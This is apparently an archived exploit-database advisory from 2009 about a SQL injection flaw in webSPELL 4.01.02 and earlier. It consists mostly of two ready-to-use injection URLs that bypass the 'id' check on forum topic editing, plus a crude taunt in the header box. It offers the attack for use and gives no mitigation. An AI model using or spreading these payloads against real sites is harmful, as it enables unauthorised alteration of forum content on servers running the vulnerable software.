[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability
# Published : 2009-01-04
# Author : StAkeR
# Previous Title : PHPAuctionSystem Insecure Cookie Handling Vulnerability
# Next Title : PNphpBB2 <= 1.2i (ModName) Multiple Local File Inclusion Exploit


+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
|  webSPELL <= 4.01.02 (id) Remote Edit Topics Vulnerability  |      Note       |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+=--=--=--=--=--=-+
| discovered by athos - staker[at]hotmail[dot]it              | magic quotes 0  |       
| download on http://wesbpell.org                             | enjoy your aids |
+=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=+--=--=--=--=--=-=+
| Exploit                                                                       |
| index.php?site=forum_topic&topic=[ID]&edit=true&id=1/**/%27/**/OR/**/1=1/*    |
| index.php?site=forum_topic&topic=1&edit=true&id=1/**/%27/**/OR/**/1=1/*       |
+=--=--=--=--=--+--=--=--=--=--=--=--=--=--=--=--=--=--=--=--+-=--=--=--=--=--=+
                | http://www.youtube.com/watch?v=SY1SwqLOC3c |
                +--=--=--=--=--=--=--=--=--=--=--=--=--=--=--+

# www.Syue.com [2009-01-04]